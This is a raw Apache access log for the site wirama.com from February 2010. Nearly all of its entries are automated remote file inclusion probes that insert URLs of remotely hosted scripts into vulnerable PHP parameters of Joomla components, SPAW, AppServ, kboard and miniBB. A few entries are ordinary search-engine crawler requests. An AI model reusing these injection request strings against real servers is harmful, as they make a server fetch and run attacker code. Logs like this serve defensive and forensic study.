222.237.78.123 - - [01/Feb/2010:12:35:10 -0800] "GET /components/com_simpleboard/file_upload.php?sbp=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
222.237.78.123 - - [01/Feb/2010:12:35:10 -0800] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
222.237.78.123 - - [01/Feb/2010:12:35:10 -0800] "GET /logs/access_090331.log//components/com_simpleboard/file_upload.php?sbp=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
222.237.78.123 - - [01/Feb/2010:12:35:51 -0800] "GET /components/com_simpleboard/file_upload.php?sbp=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
222.237.78.123 - - [01/Feb/2010:12:35:51 -0800] "GET /logs/access_090331.log//components/com_simpleboard/file_upload.php?sbp=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
222.237.78.123 - - [01/Feb/2010:12:35:51 -0800] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
222.237.78.123 - - [01/Feb/2010:12:36:30 -0800] "GET /logs/access_090401.log//components/com_simpleboard/file_upload.php?sbp=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
58.150.99.131 - - [01/Feb/2010:12:37:16 -0800] "GET /logs/access_090801.log///appserv/main.php?appserv_root=http://www.qqe.ru/forum/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
58.150.99.131 - - [01/Feb/2010:12:37:16 -0800] "GET //appserv/main.php?appserv_root=http://www.qqe.ru/forum/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
58.150.99.131 - - [01/Feb/2010:12:37:16 -0800] "GET /logs///appserv/main.php?appserv_root=http://www.qqe.ru/forum/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
222.237.78.123 - - [01/Feb/2010:12:37:40 -0800] "GET /logs/access_090401.log//components/com_simpleboard/file_upload.php?sbp=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
58.150.99.131 - - [01/Feb/2010:12:38:01 -0800] "GET /logs/access_091031.log///appserv/main.php?appserv_root=http://www.qqe.ru/forum/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
222.237.78.123 - - [01/Feb/2010:12:39:23 -0800] "GET /logs/access_090329.log//components/com_simpleboard/file_upload.php?sbp=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
222.237.78.123 - - [01/Feb/2010:12:40:11 -0800] "GET /logs/access_090329.log//components/com_simpleboard/file_upload.php?sbp=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
222.237.78.123 - - [01/Feb/2010:12:41:47 -0800] "GET /logs/access_090330.log//components/com_simpleboard/file_upload.php?sbp=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
222.237.78.123 - - [01/Feb/2010:12:42:50 -0800] "GET /logs/access_090330.log//components/com_simpleboard/file_upload.php?sbp=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.233.3.101 - - [01/Feb/2010:12:47:02 -0800] "GET /logs/access_090329.log%20%20//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.233.3.101 - - [01/Feb/2010:12:47:02 -0800] "GET /config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.233.3.101 - - [01/Feb/2010:12:47:02 -0800] "GET /logs//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.233.3.101 - - [01/Feb/2010:12:47:24 -0800] "GET /config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.233.3.101 - - [01/Feb/2010:12:47:24 -0800] "GET /logs//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.233.3.101 - - [01/Feb/2010:12:47:24 -0800] "GET /logs/access_090329.log%20%20//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.233.3.101 - - [01/Feb/2010:12:54:43 -0800] "GET /logs/access_090801.log%20%20//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
65.55.106.138 - - [01/Feb/2010:12:54:45 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
211.233.3.101 - - [01/Feb/2010:12:54:47 -0800] "GET /logs/access_090801.log%20%20//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.233.3.101 - - [01/Feb/2010:12:56:29 -0800] "GET /logs/access_090329.log//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.233.3.101 - - [01/Feb/2010:12:56:31 -0800] "GET /logs/access_090329.log//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
65.55.106.138 - - [01/Feb/2010:12:56:37 -0800] "GET /tmp/?M=A HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.207.23 - - [01/Feb/2010:13:01:11 -0800] "GET /?M=A HTTP/1.1" 200 916 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
79.170.45.126 - - [01/Feb/2010:13:03:03 -0800] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:13:03:03 -0800] "GET /logs/access_090330.log///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:13:03:03 -0800] "GET /logs///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
65.55.106.227 - - [01/Feb/2010:13:03:03 -0800] "GET /_private/form_results.csv HTTP/1.1" 200 0 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
79.170.45.126 - - [01/Feb/2010:13:03:04 -0800] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:13:03:04 -0800] "GET /logs///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:13:03:04 -0800] "GET /logs/access_090330.log///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
121.88.4.141 - - [01/Feb/2010:13:03:22 -0800] "GET /logs////////?mosConfig_absolute_path=http://213.186.58.150/Appz/id/FxID1.txt?? HTTP/1.1" 200 3952 "-" "Mozilla/5.0" "www.wirama.com"
121.88.4.141 - - [01/Feb/2010:13:03:22 -0800] "GET /logs/access_090330.log////////?mosConfig_absolute_path=http://213.186.58.150/Appz/id/FxID1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
121.88.4.141 - - [01/Feb/2010:13:03:22 -0800] "GET ///////?mosConfig_absolute_path=http://213.186.58.150/Appz/id/FxID1.txt?? HTTP/1.1" 200 921 "-" "Mozilla/5.0" "www.wirama.com"
79.170.45.126 - - [01/Feb/2010:13:03:23 -0800] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:13:03:23 -0800] "GET /logs///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:13:03:23 -0800] "GET /logs/access_090330.log///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:13:03:24 -0800] "GET /logs/access_090330.log///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:13:03:24 -0800] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:13:03:24 -0800] "GET /logs///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:13:03:44 -0800] "GET /logs///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:13:03:44 -0800] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:13:03:44 -0800] "GET /logs/access_090330.log///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:13:03:48 -0800] "GET /logs///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:13:03:48 -0800] "GET /logs///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:13:03:48 -0800] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:13:03:48 -0800] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:13:03:48 -0800] "GET /logs/access_090330.log///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:13:03:48 -0800] "GET /logs/access_090330.log///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:13:03:48 -0800] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:13:03:48 -0800] "GET /logs/access_090330.log///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:13:03:48 -0800] "GET /logs///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:13:06:16 -0800] "GET /logs///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.170.45.126 - - [01/Feb/2010:13:06:16 -0800] "GET /logs/access_090330.log%20%20///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.170.45.126 - - [01/Feb/2010:13:06:16 -0800] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.170.45.126 - - [01/Feb/2010:13:06:17 -0800] "GET /logs///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.170.45.126 - - [01/Feb/2010:13:06:17 -0800] "GET /logs/access_090330.log%20%20///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.170.45.126 - - [01/Feb/2010:13:06:19 -0800] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.170.45.126 - - [01/Feb/2010:13:06:19 -0800] "GET /logs///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.170.45.126 - - [01/Feb/2010:13:06:19 -0800] "GET /logs/access_090330.log%20%20///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.170.45.126 - - [01/Feb/2010:13:06:20 -0800] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.170.45.126 - - [01/Feb/2010:13:06:29 -0800] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.170.45.126 - - [01/Feb/2010:13:06:29 -0800] "GET /logs///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.170.45.126 - - [01/Feb/2010:13:06:29 -0800] "GET /logs/access_090330.log%20%20///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.170.45.126 - - [01/Feb/2010:13:06:29 -0800] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.170.45.126 - - [01/Feb/2010:13:06:29 -0800] "GET /logs///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.170.45.126 - - [01/Feb/2010:13:06:29 -0800] "GET /logs/access_090330.log%20%20///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.170.45.126 - - [01/Feb/2010:13:06:37 -0800] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.170.45.126 - - [01/Feb/2010:13:06:37 -0800] "GET /logs///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.170.45.126 - - [01/Feb/2010:13:06:37 -0800] "GET /logs/access_090330.log%20%20///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.170.45.126 - - [01/Feb/2010:13:06:37 -0800] "GET /logs///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.170.45.126 - - [01/Feb/2010:13:06:37 -0800] "GET /logs/access_090330.log%20%20///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.170.45.126 - - [01/Feb/2010:13:06:40 -0800] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.170.45.126 - - [01/Feb/2010:13:06:59 -0800] "GET /logs///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.170.45.126 - - [01/Feb/2010:13:06:59 -0800] "GET /logs/access_090330.log%20%20///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.170.45.126 - - [01/Feb/2010:13:06:59 -0800] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
121.88.4.141 - - [01/Feb/2010:13:07:15 -0800] "GET /logs/access_090329.log////////?mosConfig_absolute_path=http://213.186.58.150/Appz/id/FxID1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.170.45.126 - - [01/Feb/2010:13:09:52 -0800] "GET /logs/access_090801.log%20%20///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.170.45.126 - - [01/Feb/2010:13:09:56 -0800] "GET /logs/access_090801.log%20%20///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.170.45.126 - - [01/Feb/2010:13:11:00 -0800] "GET /logs/access_090801.log%20%20///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.170.45.126 - - [01/Feb/2010:13:11:09 -0800] "GET /logs/access_090801.log%20%20///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.170.45.126 - - [01/Feb/2010:13:11:20 -0800] "GET /logs/access_090801.log%20%20///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.170.45.126 - - [01/Feb/2010:13:11:21 -0800] "GET /logs/access_090801.log%20%20///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.170.45.126 - - [01/Feb/2010:13:11:22 -0800] "GET /logs/access_090801.log%20%20///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.170.45.126 - - [01/Feb/2010:13:11:26 -0800] "GET /logs/access_090801.log%20%20///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.193.131.164 - - [01/Feb/2010:13:13:18 -0800] "GET /logs//components/minibb/index.php?absolute_path=http://www.matthewchang.com/bbs/skin/zero_vote/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.193.131.164 - - [01/Feb/2010:13:13:18 -0800] "GET /logs/access_090329.log%20%20//components/minibb/index.php?absolute_path=http://www.matthewchang.com/bbs/skin/zero_vote/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.193.131.164 - - [01/Feb/2010:13:13:18 -0800] "GET /components/minibb/index.php?absolute_path=http://www.matthewchang.com/bbs/skin/zero_vote/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.193.131.164 - - [01/Feb/2010:13:13:28 -0800] "GET /logs//components/minibb/index.php?absolute_path=http://www.matthewchang.com/bbs/skin/zero_vote/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.193.131.164 - - [01/Feb/2010:13:13:29 -0800] "GET /components/minibb/index.php?absolute_path=http://www.matthewchang.com/bbs/skin/zero_vote/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
